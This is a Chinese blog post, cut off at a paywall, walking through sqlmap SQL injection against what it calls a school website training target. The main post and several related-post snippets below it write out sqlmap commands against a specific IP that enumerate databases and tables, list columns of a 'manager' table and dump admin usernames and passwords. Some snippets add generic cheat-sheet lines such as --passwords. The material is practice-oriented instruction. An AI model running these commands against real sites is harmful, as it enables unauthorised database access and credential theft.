sqlmap实战,攻击学校学院网站(靶机)

最新推荐文章于 2025-10-16 17:01:19 发布
原创 最新推荐文章于 2025-10-16 17:01:19 发布 · 2k 阅读 · 26 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库 #信息安全

本文详细介绍了使用sqlmap工具攻击学院网站靶机,通过寻找注入点,利用sqlmap获取管理员密码的过程。经过一步步操作,确定数据库、表及字段,最终揭示了经过base64和MD5双重加密的密码。

sqlmap实战,获取学院网站(靶机)管理员密码

首先获取学院网址,寻找注入点,利用上节学到的sqlmap使用方法
然后直接放进sqlmap里运行,输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027
如下图

在这里插入图片描述
接着找出所有数据库,输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027 --dbs
运行结果如下
在这里插入图片描述
接着选择rjxy数据库,找出所有的表,输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027 -D rjxy --tables
运行结果如下
在这里插入图片描述
要寻找管理员密码,所以选择manager表,找出里面所有字段
输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027 -D rjxy -T manager --columns
结果如下

最低0.47元/天 解锁文章
曦枳icon.
关注
【网络安全】sqlmap实战
你在看屏幕的同时,屏幕也在注视着你
04-09 1568
sqlmap实战一、sqlmap配置(1)python27安装(2)sqlmap安装(3)配置环境变量(4)验证是否配置完成二、sqlmap语法(1)常用语法及其说明(2)sqlmap的使用说明三、sqlmap实战实战操作四、总结 一、sqlmap配置 (1)python27安装 python2.7 下载地址 这里可以任意选择一个2.7的版本进行下载. 安装的时候最好自己新建一个python文件夹安装(我这里安装路径为D:\python\python2.7) (2)sqlmap安装 1.sqlmap的 下
SQL 注入之 sqlmap 实战
2301_77160226的博客
08-29 1880
sqlmap 是一款自动化的 SQL 注入工具,它可以检测、利用和接管数据库服务器。它支持多种数据库管理系统,包括 MySQL、Oracle、PostgreSQL、Microsoft SQL Server 等。自动化检测:能够自动检测目标网站是否存在 SQL 注入漏洞。多种攻击方式:支持基于错误、布尔盲注、时间盲注等多种 SQL 注入攻击方式。数据库枚举:可以枚举数据库的名称、表名、列名和数据。权限提升:尝试提升数据库用户的权限,以获取更高的访问权限。
渗透测试—手把手教你sqlmap数据库注入测试—靶场实战教程建议收藏!
最新发布
wholeliubei的博客
10-16 700
SQLMap是一款自动化SQL注入工具,支持5种注入模式(布尔盲注、时间盲注、报错注入、联合查询和堆叠查询),可检测和利用网站SQL注入漏洞。它支持主流数据库如MySQL、Oracle等,通过简单命令即可扫描目标网站、获取数据库信息(库名、表名、字段等)。安装需Python3环境,使用时可通过代理参数配合BurpSuite抓包分析。该工具既能用于渗透测试,也能帮助开发者发现自身系统漏洞,是网络安全领域的重要工具。
SQLmap实战
unsurpassed的博客
03-13 793
1、实战mssql 判断注入类型 python sqlmap.py -u 注入点 判断当前用户是否是dba python sqlmap.py -u 注入点 --is-dba -v 1 列举数据库用户 python sqlmap.py -u 注入点 --users -v 0 列举数据库密码 python sqlmap.py -u 注入点 --passwords -v 0 查看用户权限 ...
使用SQLMAP网站数据库进行SQL注入攻击
zhangjie15397的专栏
09-18 9975
from:http://www.blackmoreops.com/2014/05/07/use-sqlmap-sql-injection-hack-website-database/ 0x00 背景介绍 1. 什么是SQL注入? SQL注入是一种代码注入技术,过去常常用于攻击数据驱动性的应用,比如将恶意的SQL代码注入到特定字段用于实施拖库攻击等。SQL注入的成功必须借助应用程序
Sqlmap实战
ChuMeng1999的博客
01-18 753
1.(单选)有关sqlmap常用选项下列说法正确的是? A:#sqlmap选项-p用于指定参数 B:#使用sqlmap选项-f可以判别数据库类型 C:#使用sqlmap选项–proxy可以设置代理 D:#以上都正确 2.(单选)Sqlmap是哪种语言开发的程序? A:C B:C++ C:Python D:Golang 3.(单选)Sqlmap需要在哪种语言环境下运行? A:Java B:Python C:PHP D:JSP ...
sqlmap实战(学校靶机
weixin_50401030的博客
09-10 320
进入靶机 打开sqlmap 先找注入点,然后再将网站丢到sqlmap里面测试能不能注入 sqlmap.py -u "http://.../narticle.php?nid=3050" 这里显然是可以注入的,然后再找数据库 sqlmap.py -u "http://.../narticle.php?nid=3050" --dbs 找到数据库看到因为是软件学院所以显然是从rjxy下手找表 sqlmap.py -u "http://.../narticle.ph..
sqlmap实战攻击靶机
weixin_50644630的博客
09-12 1067
sqlmap实战(攻击学校靶机) 进入学校靶机 找到注入点,并放入sqlmap中测试是否可以注入 查看数据库 sqlmap -u "http://117.167.136.244:28011/index/narticle.php?nid=3050" --dbs 查询数据库 “rjxy” 的数据表 sqlmap -u "http://117.167.136.244:28011/index/narticle.php?nid=3050" -D rjxy --tables 查询manager数据表的字段
神器SQLmap实战详解
Sgirll的博客
04-07 726
本文将以SQLMap工具为核心,深入探讨SQL注入的原理、检测、利用及防御策略,旨在为网络安全研究人员、渗透测试人员提供实用指南。通过学习和使用像SQLMap这样的工具,我们不仅能够更好地理解SQL注入的原理和攻击手法,还能够加强我们的应用程序和数据库的安全防护。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责。SQLMap是一款开源的自动化SQL注入测试工具,它能够检测和利用Web应用中的SQL注入漏洞。
sqlmap实战
jihaichen的博客
05-06 585
1、实战mssql 判断注入类型 python sqlmap.py -u 注入点 判断当前用户是否是dba python sqlmap.py -u 注入点 --is-dba -v 1 列举数据库用户 python sqlmap.py -u 注入点 --users -v 0 列举数据库密码 python sqlmap.py -u 注入点 --passwords -v 0 查看用户权限 p...
SQLMAP使用实战测试
06-12
对于SQLmap的使用教程,挺实用的,详细可能差不多
sqlmap靶机实战
qq_46485934的博客
09-10 489
一.寻找目标网站的注入点(靶机实战) 寻找注入点,随机点击一篇文章 url :http://117.167.136.244:28026/index/narticle.php?nid=3099 sql注入测试:http://117.167.136.244:28026/index/narticle.php?nid=3099’ 确定存在注入 二.使用sqlmap sqlmap -u “http://117.167.136.244:28026/index/narticle.php?nid=3094” -dbs
sqlmap实战靶机
sweetie 的博客
09-10 1260
sqlmap攻击学校靶机 进入学校网页主页 随机点击 使用命令>python2 sqlmap.py -u “http://117.167.136.244:28004/index/narticle.php?nid=3094” --dump -D rjxy -T manager -C “password,username” 遇到选择 do you want to crack them via a dictionary-based attack? [Y/n/q] Y do you want to use
sqlmap的应用实战
vala0901的博客
05-10 7369
小白一枚,在大神的各种帖子帮助下刚学会用sqlmap,写下过程一起分享
转载:sqlmap的应用实战
sinolzeng的专栏
02-13 431
原文链接:https://blog.youkuaiyun.com/vala0901/article/details/71548954 有幸在kali中文网上查看了很多大神写的sqlmap的教程,其中还在大神的文章里找到了一个悲催的网站www.bible-history.com/,所以就按照前人总结,给这个悲催的网站脱裤了。。。。下面详细的讲一下怎么给网站脱裤,啊,不,是拖库。。。。。 1.首先要知道可以注入的网址是什么 http://www.bible-history.com/subcat.php?id=..
sqlmap实战oracle,网络攻防实战-sqlmap从入门到精通
weixin_39950083的博客
04-14 676
网络攻防实战-sqlmap从入门到精通第1章sqlmap安装及搭建测试平台1.1在windows上安装sqlmap1.2在centos上安装sqlmap1.3在kali虚拟机中安装及使用sqlmap1.4在kali上搭建dvwa测试平台1.5在windows上搭建sqlab测试平台第2章sqlmap基础及使用2.1配置sqlmap2.2sqlmap目录及结构2.3SQLMap使用攻略及技巧-已经完...
sqlmap工具的实操--sql注入
weixin_66839513的博客
04-01 5666
sql注入原理就是将恶意的sql语句通过表单或者url拼接到web后端的查询语句中,绕过后端的认证,在后端被服务器执行恶意的sql语句,获取到数据库的权限,从而对数据库进行执行操作,造成数据的篡改及泄露。
sqlmap攻击网站
03-03
### 如何使用Sqlmap进行SQL注入攻击测试 #### 安装Sqlmap 为了开始使用 Sqlmap 工具,首先需要安装该软件。可以通过访问官方 GitHub 页面下载最新版本并按照说明完成安装过程[^1]。 #### 配置环境准备 确保操作系统环境中已正确配置 Python 解释器以及其他依赖项以便顺利运行 Sqlmap 脚本文件[^3]。 #### 基础命令结构 基本的 Sqlmap 执行语句如下所示: ```bash sqlmap -u "http://example.com/vulnerable_page?id=1" ``` 这条指令指定了要扫描的目标 URL 参数 `id` 的值为 `1` 。这一步骤用于确认是否存在潜在可被利用的 SQL 注入点以及识别后台使用的数据库管理系统(DBMS) 类型[^5]。 #### 获取更多信息 一旦发现了有效的注入位置,则可通过附加选项进一步探索受影响系统的内部细节: - **--dbs**: 列举所有可用数据库名称。 - **-D db_name --tables**: 显示特定数据库内的表名列表。 - **-T table_name --columns**: 展示某张表格里的列定义详情。 - **-C column --dump**: 导出指定字段的数据记录集。 例如, 若要获取整个架构视图,可以依次输入上述各条目对应的完整调用形式: ```bash # 查看有哪些库 sqlmap -u "http://example.com/vulnerable_page?id=1" --dbs # 选定某个具体库后查看其下的表 sqlmap -u "http://example.com/vulnerable_page?id=1" -D 'database_name' --tables # 探索单个表内含有的列项目 sqlmap -u "http://example.com/vulnerable_page?id=1" -D 'database_name' -T 'table_name' --columns # 把关注的重点放在某些重要数据上 sqlmap -u "http://example.com/vulnerable_page?id=1" -D 'database_name' -T 'table_name' -C 'column_name' --dump ``` 请注意,在实际操作过程中应当遵循合法合规的原则来进行安全评估活动,严禁未经授权擅自尝试入侵他人信息系统的行为[^2]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值